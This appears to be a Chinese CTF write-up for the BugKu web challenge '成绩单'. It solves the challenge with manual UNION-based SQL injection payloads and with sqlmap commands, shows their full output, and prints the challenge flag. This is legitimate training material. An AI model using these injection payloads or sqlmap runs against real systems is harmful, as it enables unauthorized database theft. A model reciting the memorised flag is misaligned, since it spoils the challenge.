BugKuCTF WEB 成绩单

http://123.206.87.240:8002/chengjidan/

题解：

版本一

输入0' union select database(),2,3,4 #

数据库名：skctf_flag

输入0' union select table_name,2,3,4 from information_schema.tables where table_schema='skctf_flag'# 

数据库表名：fl4g  

输入0' union select column_name,2,3,4 from information_schema.columns where table_name='fl4g'#

数据库列名：skctf_flag

输入0' union select skctf_flag,2,3,4 from fl4g#

flag：BUGKU{Sql_INJECT0N_4813drd8hz4} 

版本二

工具：sqlmap

sqlmap检测sql注入

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1"

 结果

POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests:
---
Parameter: id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'fELh'='fELh
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-7971' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x4156665a546b554a6a64424c6354514d526f575257527a65414d586d516d6a765548776476594570,0x716b707671),NULL-- ErNP
---
[11:01:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

数据库：mysql

 列举数据库

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" --dbs

结果

available databases [2]:
[*] information_schema
[*] skctf_flag

数据库：skctf_flag

列举数据库skctf_flag的表 

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump

结果

Database: skctf_flag
[2 tables]
+------+
| fl4g |
| sc   |
+------+

skctf_flag的数据表：

fl4g

sc

 列举内容

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump

结果 

Database: skctf_flag
Table: sc
[3 entries]
+----+------+------+---------+---------+
| id | name | math | chinese | english |
+----+------+------+---------+---------+
| 1  | 龙龙龙  | 60   | 70      | 60      |
| 2  | 浩儿   | 70   | 74      | 84      |
| 3  | 静静   | 80   | 90      | 85      |
+----+------+------+---------+---------+
 
[11:13:09] [INFO] table 'skctf_flag.sc' dumped to CSV file 'C:\Users\Administrator\.sqlmap\output\120.24.86.145\dump\skctf_flag\sc.csv'
[11:13:09] [INFO] fetching columns for table 'fl4g' in database 'skctf_flag'
[11:13:09] [INFO] used SQL query returns 1 entries
[11:13:09] [INFO] fetching entries for table 'fl4g' in database 'skctf_flag'
[11:13:09] [INFO] used SQL query returns 1 entries
[11:13:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:13:09] [INFO] fetching number of entries for table 'fl4g' in database 'skctf_flag'
[11:13:09] [WARNING] time-based comparison requires larger statistical model, please wait................  (done)
[11:13:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[11:17:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait..............................  (done)
[11:18:03] [INFO] adjusting time delay to 2 seconds due to good response times
BUGKU
 
[11:18:42] [ERROR] invalid character detected. retrying..
[11:18:42] [WARNING] increasing time delay to 3 seconds
{Sq
 
[11:20:01] [ERROR] invalid character detected. retrying..
[11:20:01] [WARNING] increasing time delay to 4 seconds
l_INJE
 
[11:21:48] [ERROR] invalid character detected. retrying..
[11:21:48] [WARNING] increasing time delay to 5 seconds
CT0N_4
 
[11:24:01] [ERROR] invalid character detected. retrying..
[11:24:01] [WARNING] increasing time delay to 6 seconds
81
 
[11:24:54] [ERROR] invalid character detected. retrying..
[11:24:54] [WARNING] increasing time delay to 7 seconds
3dr
 
[11:26:24] [ERROR] invalid character detected. retrying..
[11:26:24] [WARNING] increasing time delay to 8 seconds
d
 
[11:27:10] [ERROR] invalid character detected. retrying..
[11:27:10] [WARNING] increasing time delay to 9 seconds
8hz4}
Database: skctf_flag
Table: fl4g
[1 entry]
+---------------------------------+
| skctf_flag                      |
+---------------------------------+
| BUGKU{Sql_INJECT0N_4813drd8hz4} |
+---------------------------------+

flag：BUGKU{Sql_INJECT0N_4813drd8hz4}